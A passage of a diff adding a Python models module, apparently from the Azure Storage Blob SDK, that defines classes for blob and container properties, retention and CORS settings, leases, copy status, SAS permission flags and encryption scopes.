default. + """ + + def __init__(self, **kwargs): + self.version = kwargs.get('version', u'1.0') + self.delete = kwargs.get('delete', False) + self.read = kwargs.get('read', False) + self.write = kwargs.get('write', False) + self.retention_policy = kwargs.get('retention_policy') or RetentionPolicy() + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + version=generated.version, + delete=generated.delete, + read=generated.read, + write=generated.write, + retention_policy=RetentionPolicy._from_generated(generated.retention_policy) # pylint: disable=protected-access + ) + + +class Metrics(GeneratedMetrics): + """A summary of request statistics grouped by API in hour or minute aggregates + for blobs. + + :keyword str version: + The version of Storage Analytics to configure. The default value is 1.0. + :keyword bool enabled: + Indicates whether metrics are enabled for the Blob service. + The default value is `False`. + :keyword bool include_apis: + Indicates whether metrics should generate summary statistics for called API operations. + :keyword ~azure.storage.blob.RetentionPolicy retention_policy: + Determines how long the associated data should persist. If not specified the retention + policy will be disabled by default. + """ + + def __init__(self, **kwargs): + self.version = kwargs.get('version', u'1.0') + self.enabled = kwargs.get('enabled', False) + self.include_apis = kwargs.get('include_apis') + self.retention_policy = kwargs.get('retention_policy') or RetentionPolicy() + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + version=generated.version, + enabled=generated.enabled, + include_apis=generated.include_apis, + retention_policy=RetentionPolicy._from_generated(generated.retention_policy) # pylint: disable=protected-access + ) + + +class RetentionPolicy(GeneratedRetentionPolicy): + """The retention policy which determines how long the associated data should + persist. + + :param bool enabled: + Indicates whether a retention policy is enabled for the storage service. + The default value is False. + :param int days: + Indicates the number of days that metrics or logging or + soft-deleted data should be retained. All data older than this value will + be deleted. If enabled=True, the number of days must be specified. + """ + + def __init__(self, enabled=False, days=None): + super(RetentionPolicy, self).__init__(enabled=enabled, days=days, allow_permanent_delete=None) + if self.enabled and (self.days is None): + raise ValueError("If policy is enabled, 'days' must be specified.") + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + enabled=generated.enabled, + days=generated.days, + ) + + +class StaticWebsite(GeneratedStaticWebsite): + """The properties that enable an account to host a static website. + + :keyword bool enabled: + Indicates whether this account is hosting a static website. + The default value is `False`. + :keyword str index_document: + The default name of the index page under each directory. + :keyword str error_document404_path: + The absolute path of the custom 404 page. + :keyword str default_index_document_path: + Absolute path of the default index page. + """ + + def __init__(self, **kwargs): + self.enabled = kwargs.get('enabled', False) + if self.enabled: + self.index_document = kwargs.get('index_document') + self.error_document404_path = kwargs.get('error_document404_path') + self.default_index_document_path = kwargs.get('default_index_document_path') + else: + self.index_document = None + self.error_document404_path = None + self.default_index_document_path = None + + @classmethod + def _from_generated(cls, generated): + if not generated: + return cls() + return cls( + enabled=generated.enabled, + index_document=generated.index_document, + error_document404_path=generated.error_document404_path, + default_index_document_path=generated.default_index_document_path + ) + + +class CorsRule(GeneratedCorsRule): + """CORS is an HTTP feature that enables a web application running under one + domain to access resources in another domain. Web browsers implement a + security restriction known as same-origin policy that prevents a web page + from calling APIs in a different domain; CORS provides a secure way to + allow one domain (the origin domain) to call APIs in another domain. + + :param list(str) allowed_origins: + A list of origin domains that will be allowed via CORS, or "*" to allow + all domains. The list of must contain at least one entry. Limited to 64 + origin domains. Each allowed origin can have up to 256 characters. + :param list(str) allowed_methods: + A list of HTTP methods that are allowed to be executed by the origin. + The list of must contain at least one entry. For Azure Storage, + permitted methods are DELETE, GET, HEAD, MERGE, POST, OPTIONS or PUT. + :keyword list(str) allowed_headers: + Defaults to an empty list. A list of headers allowed to be part of + the cross-origin request. Limited to 64 defined headers and 2 prefixed + headers. Each header can be up to 256 characters. + :keyword list(str) exposed_headers: + Defaults to an empty list. A list of response headers to expose to CORS + clients. Limited to 64 defined headers and two prefixed headers. Each + header can be up to 256 characters. + :keyword int max_age_in_seconds: + The number of seconds that the client/browser should cache a + preflight response. + """ + + def __init__(self, allowed_origins, allowed_methods, **kwargs): + self.allowed_origins = ','.join(allowed_origins) + self.allowed_methods = ','.join(allowed_methods) + self.allowed_headers = ','.join(kwargs.get('allowed_headers', [])) + self.exposed_headers = ','.join(kwargs.get('exposed_headers', [])) + self.max_age_in_seconds = kwargs.get('max_age_in_seconds', 0) + + @classmethod + def _from_generated(cls, generated): + return cls( + [generated.allowed_origins], + [generated.allowed_methods], + allowed_headers=[generated.allowed_headers], + exposed_headers=[generated.exposed_headers], + max_age_in_seconds=generated.max_age_in_seconds, + ) + + +class ContainerProperties(DictMixin): + """Blob container's properties class. + + Returned ``ContainerProperties`` instances expose these values through a + dictionary interface, for example: ``container_props["last_modified"]``. + Additionally, the container name is available as ``container_props["name"]``. + + :ivar str name: + Name of the container. + :ivar ~datetime.datetime last_modified: + A datetime object representing the last time the container was modified. + :ivar str etag: + The ETag contains a value that you can use to perform operations + conditionally. + :ivar ~azure.storage.blob.LeaseProperties lease: + Stores all the lease information for the container. + :ivar str public_access: Specifies whether data in the container may be accessed + publicly and the level of access. + :ivar bool has_immutability_policy: + Represents whether the container has an immutability policy. + :ivar bool has_legal_hold: + Represents whether the container has a legal hold. + :ivar bool immutable_storage_with_versioning_enabled: + Represents whether immutable storage with versioning enabled on the container. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :ivar dict metadata: A dict with name-value pairs to associate with the + container as metadata. + :ivar ~azure.storage.blob.ContainerEncryptionScope encryption_scope: + The default encryption scope configuration for the container. + :ivar bool deleted: + Whether this container was deleted. + :ivar str version: + The version of a deleted container. + """ + + def __init__(self, **kwargs): + self.name = None + self.last_modified = kwargs.get('Last-Modified') + self.etag = kwargs.get('ETag') + self.lease = LeaseProperties(**kwargs) + self.public_access = kwargs.get('x-ms-blob-public-access') + self.has_immutability_policy = kwargs.get('x-ms-has-immutability-policy') + self.deleted = None + self.version = None + self.has_legal_hold = kwargs.get('x-ms-has-legal-hold') + self.metadata = kwargs.get('metadata') + self.encryption_scope = None + self.immutable_storage_with_versioning_enabled = kwargs.get('x-ms-immutable-storage-with-versioning-enabled') + default_encryption_scope = kwargs.get('x-ms-default-encryption-scope') + if default_encryption_scope: + self.encryption_scope = ContainerEncryptionScope( + default_encryption_scope=default_encryption_scope, + prevent_encryption_scope_override=kwargs.get('x-ms-deny-encryption-scope-override', False) + ) + + @classmethod + def _from_generated(cls, generated): + props = cls() + props.name = generated.name + props.last_modified = generated.properties.last_modified + props.etag = generated.properties.etag + props.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access + props.public_access = generated.properties.public_access + props.has_immutability_policy = generated.properties.has_immutability_policy + props.immutable_storage_with_versioning_enabled = \ + generated.properties.is_immutable_storage_with_versioning_enabled + props.deleted = generated.deleted + props.version = generated.version + props.has_legal_hold = generated.properties.has_legal_hold + props.metadata = generated.metadata + props.encryption_scope = ContainerEncryptionScope._from_generated(generated) #pylint: disable=protected-access + return props + + +class ContainerPropertiesPaged(PageIterator): + """An Iterable of Container properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A container name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.ContainerProperties) + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only containers whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of container names to retrieve per + call. + :param str continuation_token: An opaque continuation token. + """ + def __init__(self, command, prefix=None, results_per_page=None, continuation_token=None): + super(ContainerPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.current_page = [self._build_item(item) for item in self._response.container_items] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + return ContainerProperties._from_generated(item) # pylint: disable=protected-access + + +class ImmutabilityPolicy(DictMixin): + """Optional parameters for setting the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime expiry_time: + Specifies the date time when the blobs immutability policy is set to expire. + :keyword str or ~azure.storage.blob.BlobImmutabilityPolicyMode policy_mode: + Specifies the immutability policy mode to set on the blob. + Possible values to set include: "Locked", "Unlocked". + "Mutable" can only be returned by service, don't set to "Mutable". + """ + + def __init__(self, **kwargs): + self.expiry_time = kwargs.pop('expiry_time', None) + self.policy_mode = kwargs.pop('policy_mode', None) + + @classmethod + def _from_generated(cls, generated): + immutability_policy = cls() + immutability_policy.expiry_time = generated.properties.immutability_policy_expires_on + immutability_policy.policy_mode = generated.properties.immutability_policy_mode + return immutability_policy + + +class BlobProperties(DictMixin): + """ + Blob Properties. + + :ivar str name: + The name of the blob. + :ivar str container: + The container in which the blob resides. + :ivar str snapshot: + Datetime value that uniquely identifies the blob snapshot. + :ivar ~azure.blob.storage.BlobType blob_type: + String indicating this blob's type. + :ivar dict metadata: + Name-value pairs associated with the blob as metadata. + :ivar ~datetime.datetime last_modified: + A datetime object representing the last time the blob was modified. + :ivar str etag: + The ETag contains a value that you can use to perform operations + conditionally. + :ivar int size: + The size of the content returned. If the entire blob was requested, + the length of blob in bytes. If a subset of the blob was requested, the + length of the returned subset. + :ivar str content_range: + Indicates the range of bytes returned in the event that the client + requested a subset of the blob. + :ivar int append_blob_committed_block_count: + (For Append Blobs) Number of committed blocks in the blob. + :ivar bool is_append_blob_sealed: + Indicate if the append blob is sealed or not. + + .. versionadded:: 12.4.0 + + :ivar int page_blob_sequence_number: + (For Page Blobs) Sequence number for page blob used for coordinating + concurrent writes. + :ivar bool server_encrypted: + Set to true if the blob is encrypted on the server. + :ivar ~azure.storage.blob.CopyProperties copy: + Stores all the copy properties for the blob. + :ivar ~azure.storage.blob.ContentSettings content_settings: + Stores all the content settings for the blob. + :ivar ~azure.storage.blob.LeaseProperties lease: + Stores all the lease information for the blob. + :ivar ~azure.storage.blob.StandardBlobTier blob_tier: + Indicates the access tier of the blob. The hot tier is optimized + for storing data that is accessed frequently. The cool storage tier + is optimized for storing data that is infrequently accessed and stored + for at least a month. The archive tier is optimized for storing + data that is rarely accessed and stored for at least six months + with flexible latency requirements. + :ivar str rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :ivar ~datetime.datetime blob_tier_change_time: + Indicates when the access tier was last changed. + :ivar bool blob_tier_inferred: + Indicates whether the access tier was inferred by the service. + If false, it indicates that the tier was set explicitly. + :ivar bool deleted: + Whether this blob was deleted. + :ivar ~datetime.datetime deleted_time: + A datetime object representing the time at which the blob was deleted. + :ivar int remaining_retention_days: + The number of days that the blob will be retained before being permanently deleted by the service. + :ivar ~datetime.datetime creation_time: + Indicates when the blob was created, in UTC. + :ivar str archive_status: + Archive status of blob. + :ivar str encryption_key_sha256: + The SHA-256 hash of the provided encryption key. + :ivar str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :ivar bool request_server_encrypted: + Whether this blob is encrypted. + :ivar list(~azure.storage.blob.ObjectReplicationPolicy) object_replication_source_properties: + Only present for blobs that have policy ids and rule ids applied to them. + + .. versionadded:: 12.4.0 + + :ivar str object_replication_destination_policy: + Represents the Object Replication Policy Id that created this blob. + + .. versionadded:: 12.4.0 + + :ivar ~datetime.datetime last_accessed_on: + Indicates when the last Read/Write operation was performed on a Blob. + + .. versionadded:: 12.6.0 + + :ivar int tag_count: + Tags count on this blob. + + .. versionadded:: 12.4.0 + + :ivar dict(str, str) tags: + Key value pair of tags on this blob. + + .. versionadded:: 12.4.0 + :ivar bool has_versions_only: + A true value indicates the root blob is deleted + + .. versionadded:: 12.10.0 + + :ivar ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :ivar bool has_legal_hold: + Specified if a legal hold should be set on the blob. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + """ + + def __init__(self, **kwargs): + self.name = kwargs.get('name') + self.container = None + self.snapshot = kwargs.get('x-ms-snapshot') + self.version_id = kwargs.get('x-ms-version-id') + self.is_current_version = kwargs.get('x-ms-is-current-version') + self.blob_type = BlobType(kwargs['x-ms-blob-type']) if kwargs.get('x-ms-blob-type') else None + self.metadata = kwargs.get('metadata') + self.encrypted_metadata = kwargs.get('encrypted_metadata') + self.last_modified = kwargs.get('Last-Modified') + self.etag = kwargs.get('ETag') + self.size = kwargs.get('Content-Length') + self.content_range = kwargs.get('Content-Range') + self.append_blob_committed_block_count = kwargs.get('x-ms-blob-committed-block-count') + self.is_append_blob_sealed = kwargs.get('x-ms-blob-sealed') + self.page_blob_sequence_number = kwargs.get('x-ms-blob-sequence-number') + self.server_encrypted = kwargs.get('x-ms-server-encrypted') + self.copy = CopyProperties(**kwargs) + self.content_settings = ContentSettings(**kwargs) + self.lease = LeaseProperties(**kwargs) + self.blob_tier = kwargs.get('x-ms-access-tier') + self.rehydrate_priority = kwargs.get('x-ms-rehydrate-priority') + self.blob_tier_change_time = kwargs.get('x-ms-access-tier-change-time') + self.blob_tier_inferred = kwargs.get('x-ms-access-tier-inferred') + self.deleted = False + self.deleted_time = None + self.remaining_retention_days = None + self.creation_time = kwargs.get('x-ms-creation-time') + self.archive_status = kwargs.get('x-ms-archive-status') + self.encryption_key_sha256 = kwargs.get('x-ms-encryption-key-sha256') + self.encryption_scope = kwargs.get('x-ms-encryption-scope') + self.request_server_encrypted = kwargs.get('x-ms-server-encrypted') + self.object_replication_source_properties = kwargs.get('object_replication_source_properties') + self.object_replication_destination_policy = kwargs.get('x-ms-or-policy-id') + self.last_accessed_on = kwargs.get('x-ms-last-access-time') + self.tag_count = kwargs.get('x-ms-tag-count') + self.tags = None + self.immutability_policy = ImmutabilityPolicy(expiry_time=kwargs.get('x-ms-immutability-policy-until-date'), + policy_mode=kwargs.get('x-ms-immutability-policy-mode')) + self.has_legal_hold = kwargs.get('x-ms-legal-hold') + self.has_versions_only = None + + +class FilteredBlob(DictMixin): + """Blob info from a Filter Blobs API call. + + :ivar name: Blob name + :type name: str + :ivar container_name: Container name. + :type container_name: str + :ivar tags: Key value pairs of blob tags. + :type tags: Dict[str, str] + """ + def __init__(self, **kwargs): + self.name = kwargs.get('name', None) + self.container_name = kwargs.get('container_name', None) + self.tags = kwargs.get('tags', None) + + +class LeaseProperties(DictMixin): + """Blob Lease Properties. + + :ivar str status: + The lease status of the blob. Possible values: locked|unlocked + :ivar str state: + Lease state of the blob. Possible values: available|leased|expired|breaking|broken + :ivar str duration: + When a blob is leased, specifies whether the lease is of infinite or fixed duration. + """ + + def __init__(self, **kwargs): + self.status = get_enum_value(kwargs.get('x-ms-lease-status')) + self.state = get_enum_value(kwargs.get('x-ms-lease-state')) + self.duration = get_enum_value(kwargs.get('x-ms-lease-duration')) + + @classmethod + def _from_generated(cls, generated): + lease = cls() + lease.status = get_enum_value(generated.properties.lease_status) + lease.state = get_enum_value(generated.properties.lease_state) + lease.duration = get_enum_value(generated.properties.lease_duration) + return lease + + +class ContentSettings(DictMixin): + """The content settings of a blob. + + :param str content_type: + The content type specified for the blob. If no content type was + specified, the default content type is application/octet-stream. + :param str content_encoding: + If the content_encoding has previously been set + for the blob, that value is stored. + :param str content_language: + If the content_language has previously been set + for the blob, that value is stored. + :param str content_disposition: + content_disposition conveys additional information about how to + process the response payload, and also can be used to attach + additional metadata. If content_disposition has previously been set + for the blob, that value is stored. + :param str cache_control: + If the cache_control has previously been set for + the blob, that value is stored. + :param bytearray content_md5: + If the content_md5 has been set for the blob, this response + header is stored so that the client can check for message content + integrity. + """ + + def __init__( + self, content_type=None, content_encoding=None, + content_language=None, content_disposition=None, + cache_control=None, content_md5=None, **kwargs): + + self.content_type = content_type or kwargs.get('Content-Type') + self.content_encoding = content_encoding or kwargs.get('Content-Encoding') + self.content_language = content_language or kwargs.get('Content-Language') + self.content_md5 = content_md5 or kwargs.get('Content-MD5') + self.content_disposition = content_disposition or kwargs.get('Content-Disposition') + self.cache_control = cache_control or kwargs.get('Cache-Control') + + @classmethod + def _from_generated(cls, generated): + settings = cls() + settings.content_type = generated.properties.content_type or None + settings.content_encoding = generated.properties.content_encoding or None + settings.content_language = generated.properties.content_language or None + settings.content_md5 = generated.properties.content_md5 or None + settings.content_disposition = generated.properties.content_disposition or None + settings.cache_control = generated.properties.cache_control or None + return settings + + +class CopyProperties(DictMixin): + """Blob Copy Properties. + + These properties will be `None` if this blob has never been the destination + in a Copy Blob operation, or if this blob has been modified after a concluded + Copy Blob operation, for example, using Set Blob Properties, Upload Blob, or Commit Block List. + + :ivar str id: + String identifier for the last attempted Copy Blob operation where this blob + was the destination blob. + :ivar str source: + URL up to 2 KB in length that specifies the source blob used in the last attempted + Copy Blob operation where this blob was the destination blob. + :ivar str status: + State of the copy operation identified by Copy ID, with these values: + success: + Copy completed successfully. + pending: + Copy is in progress. Check copy_status_description if intermittent, + non-fatal errors impede copy progress but don't cause failure. + aborted: + Copy was ended by Abort Copy Blob. + failed: + Copy failed. See copy_status_description for failure details. + :ivar str progress: + Contains the number of bytes copied and the total bytes in the source in the last + attempted Copy Blob operation where this blob was the destination blob. Can show + between 0 and Content-Length bytes copied. + :ivar ~datetime.datetime completion_time: + Conclusion time of the last attempted Copy Blob operation where this blob was the + destination blob. This value can specify the time of a completed, aborted, or + failed copy attempt. + :ivar str status_description: + Only appears when x-ms-copy-status is failed or pending. Describes cause of fatal + or non-fatal copy operation failure. + :ivar bool incremental_copy: + Copies the snapshot of the source page blob to a destination page blob. + The snapshot is copied such that only the differential changes between + the previously copied snapshot are transferred to the destination + :ivar ~datetime.datetime destination_snapshot: + Included if the blob is incremental copy blob or incremental copy snapshot, + if x-ms-copy-status is success. Snapshot time of the last successful + incremental copy snapshot for this blob. + """ + + def __init__(self, **kwargs): + self.id = kwargs.get('x-ms-copy-id') + self.source = kwargs.get('x-ms-copy-source') + self.status = get_enum_value(kwargs.get('x-ms-copy-status')) + self.progress = kwargs.get('x-ms-copy-progress') + self.completion_time = kwargs.get('x-ms-copy-completion_time') + self.status_description = kwargs.get('x-ms-copy-status-description') + self.incremental_copy = kwargs.get('x-ms-incremental-copy') + self.destination_snapshot = kwargs.get('x-ms-copy-destination-snapshot') + + @classmethod + def _from_generated(cls, generated): + copy = cls() + copy.id = generated.properties.copy_id or None + copy.status = get_enum_value(generated.properties.copy_status) or None + copy.source = generated.properties.copy_source or None + copy.progress = generated.properties.copy_progress or None + copy.completion_time = generated.properties.copy_completion_time or None + copy.status_description = generated.properties.copy_status_description or None + copy.incremental_copy = generated.properties.incremental_copy or None + copy.destination_snapshot = generated.properties.destination_snapshot or None + return copy + + +class BlobBlock(DictMixin): + """BlockBlob Block class. + + :param str block_id: + Block id. + :param str state: + Block state. Possible values: committed|uncommitted + :ivar int size: + Block size in bytes. + """ + + def __init__(self, block_id, state=BlockState.Latest): + self.id = block_id + self.state = state + self.size = None + + @classmethod + def _from_generated(cls, generated): + try: + decoded_bytes = decode_base64_to_bytes(generated.name) + block_id = decoded_bytes.decode('utf-8') + # this is to fix a bug. When large blocks are uploaded through upload_blob the block id isn't base64 encoded + # while service expected block id is base64 encoded, so when we get block_id if we cannot base64 decode, it + # means we didn't base64 encode it when stage the block, we want to use the returned block_id directly. + except UnicodeDecodeError: + block_id = generated.name + block = cls(block_id) + block.size = generated.size + return block + + +class PageRange(DictMixin): + """Page Range for page blob. + + :param int start: + Start of page range in bytes. + :param int end: + End of page range in bytes. + :ivar bool cleared: + Whether the range has been cleared. + """ + + def __init__(self, start=None, end=None, *, cleared=False): + self.start = start + self.end = end + self.cleared = cleared + + +class PageRangePaged(PageIterator): + def __init__(self, command, results_per_page=None, continuation_token=None): + super(PageRangePaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.current_page = self._build_page(self._response) + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_page(response): + if not response: + raise StopIteration + + return parse_page_list(response) + + +class AccessPolicy(GenAccessPolicy): + """Access Policy class used by the set and get access policy methods in each service. + + A stored access policy can specify the start time, expiry time, and + permissions for the Shared Access Signatures with which it's associated. + Depending on how you want to control access to your resource, you can + specify all of these parameters within the stored access policy, and omit + them from the URL for the Shared Access Signature. Doing so permits you to + modify the associated signature's behavior at any time, as well as to revoke + it. Or you can specify one or more of the access policy parameters within + the stored access policy, and the others on the URL. Finally, you can + specify all of the parameters on the URL. In this case, you can use the + stored access policy to revoke the signature, but not to modify its behavior. + + Together the Shared Access Signature and the stored access policy must + include all fields required to authenticate the signature. If any required + fields are missing, the request will fail. Likewise, if a field is specified + both in the Shared Access Signature URL and in the stored access policy, the + request will fail with status code 400 (Bad Request). + + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + """ + def __init__(self, permission=None, expiry=None, start=None): + self.start = start + self.expiry = expiry + self.permission = permission + + +class ContainerSasPermissions(object): + """ContainerSasPermissions class to be used with the + :func:`~azure.storage.blob.generate_container_sas` function and + for the AccessPolicies used with + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`. + + :param bool read: + Read the content, properties, metadata or block list of any blob in the + container. Use any blob in the container as the source of a copy operation. + :param bool write: + For any blob in the container, create or write content, properties, + metadata, or block list. Snapshot or lease the blob. Resize the blob + (page blob only). Use the blob as the destination of a copy operation + within the same account. Note: You cannot grant permissions to read or + write container properties or metadata, nor to lease a container, with + a container SAS. Use an account SAS instead. + :param bool delete: + Delete any blob in the container. Note: You cannot grant permissions to + delete a container with a container SAS. Use an account SAS instead. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool list: + List blobs in the container. + :param bool tag: + Set or get tags on the blobs in the container. + :keyword bool add: + Add a block to an append blob. + :keyword bool create: + Write a new blob, snapshot a blob, or copy a blob to a new blob. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + :keyword bool filter_by_tags: + To enable finding blobs by tags. + :keyword bool move: + Move a blob or a directory and its contents to a new location. + :keyword bool execute: + Get the system properties and, if the hierarchical namespace is enabled for the storage account, + get the POSIX ACL of a blob. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. + """ + def __init__(self, read=False, write=False, delete=False, + list=False, delete_previous_version=False, tag=False, **kwargs): # pylint: disable=redefined-builtin + self.read = read + self.add = kwargs.pop('add', False) + self.create = kwargs.pop('create', False) + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.list = list + self.tag = tag + self.filter_by_tags = kwargs.pop('filter_by_tags', False) + self.move = kwargs.pop('move', False) + self.execute = kwargs.pop('execute', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('l' if self.list else '') + + ('t' if self.tag else '') + + ('f' if self.filter_by_tags else '') + + ('m' if self.move else '') + + ('e' if self.execute else '') + + ('i' if self.set_immutability_policy else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create a ContainerSasPermissions from a string. + + To specify read, write, delete, or list permissions you need only to + include the first letter of the word in the string. E.g. For read and + write permissions, you would provide a string "rw". + + :param str permission: The string which dictates the read, write, delete, + and list permissions. + :return: A ContainerSasPermissions object + :rtype: ~azure.storage.blob.ContainerSasPermissions + """ + p_read = 'r' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_list = 'l' in permission + p_tag = 't' in permission + p_filter_by_tags = 'f' in permission + p_move = 'm' in permission + p_execute = 'e' in permission + p_set_immutability_policy = 'i' in permission + parsed = cls(read=p_read, write=p_write, delete=p_delete, list=p_list, + delete_previous_version=p_delete_previous_version, tag=p_tag, add=p_add, + create=p_create, permanent_delete=p_permanent_delete, filter_by_tags=p_filter_by_tags, + move=p_move, execute=p_execute, set_immutability_policy=p_set_immutability_policy) + + return parsed + + +class BlobSasPermissions(object): + """BlobSasPermissions class to be used with the + :func:`~azure.storage.blob.generate_blob_sas` function. + + :param bool read: + Read the content, properties, metadata and block list. Use the blob as + the source of a copy operation. + :param bool add: + Add a block to an append blob. + :param bool create: + Write a new blob, snapshot a blob, or copy a blob to a new blob. + :param bool write: + Create or write content, properties, metadata, or block list. Snapshot + or lease the blob. Resize the blob (page blob only). Use the blob as the + destination of a copy operation within the same account. + :param bool delete: + Delete the blob. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool tag: + Set or get tags on the blob. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + :keyword bool move: + Move a blob or a directory and its contents to a new location. + :keyword bool execute: + Get the system properties and, if the hierarchical namespace is enabled for the storage account, + get the POSIX ACL of a blob. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. + """ + def __init__(self, read=False, add=False, create=False, write=False, + delete=False, delete_previous_version=False, tag=False, **kwargs): + self.read = read + self.add = add + self.create = create + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.tag = tag + self.move = kwargs.pop('move', False) + self.execute = kwargs.pop('execute', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('t' if self.tag else '') + + ('m' if self.move else '') + + ('e' if self.execute else '') + + ('i' if self.set_immutability_policy else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create a BlobSasPermissions from a string. + + To specify read, add, create, write, or delete permissions you need only to + include the first letter of the word in the string. E.g. For read and + write permissions, you would provide a string "rw". + + :param str permission: The string which dictates the read, add, create, + write, or delete permissions. + :return: A BlobSasPermissions object + :rtype: ~azure.storage.blob.BlobSasPermissions + """ + p_read = 'r' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_tag = 't' in permission + p_move = 'm' in permission + p_execute = 'e' in permission + p_set_immutability_policy = 'i' in permission + + parsed = cls(read=p_read, add=p_add, create=p_create, write=p_write, delete=p_delete, + delete_previous_version=p_delete_previous_version, tag=p_tag, permanent_delete=p_permanent_delete, + move=p_move, execute=p_execute, set_immutability_policy=p_set_immutability_policy) + + return parsed + + +class CustomerProvidedEncryptionKey(object): + """ + All data in Azure Storage is encrypted at-rest using an account-level encryption key. + In versions 2018-06-17 and newer, you can manage the key used to encrypt blob contents + and application metadata per-blob by providing an AES-256 encryption key in requests to the storage service. + + When you use a customer-provided key, Azure Storage does not manage or persist your key. + When writing data to a blob, the provided key is used to encrypt your data before writing it to disk. + A SHA-256 hash of the encryption key is written alongside the blob contents, + and is used to verify that all subsequent operations against the blob use the same encryption key. + This hash cannot be used to retrieve the encryption key or decrypt the contents of the blob. + When reading a blob, the provided key is used to decrypt your data after reading it from disk. + In both cases, the provided encryption key is securely discarded + as soon as the encryption or decryption process completes. + + :param str key_value: + Base64-encoded AES-256 encryption key value. + :param str key_hash: + Base64-encoded SHA256 of the encryption key. + :ivar str algorithm: + Specifies the algorithm to use when encrypting data using the given key. Must be AES256. + """ + def __init__(self, key_value, key_hash): + self.key_value = key_value + self.key_hash = key_hash + self.algorithm = 'AES256' + + +class ContainerEncryptionScope(object): + """The default encryption scope configuration for a container. + + This scope is used implicitly for all future writes within the container, + but can be overridden per blob operation. + + .. versionadded:: 12.2.0 + + :param str default_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + :param bool prevent_encryption_scope_override: + If true, prevents any request from 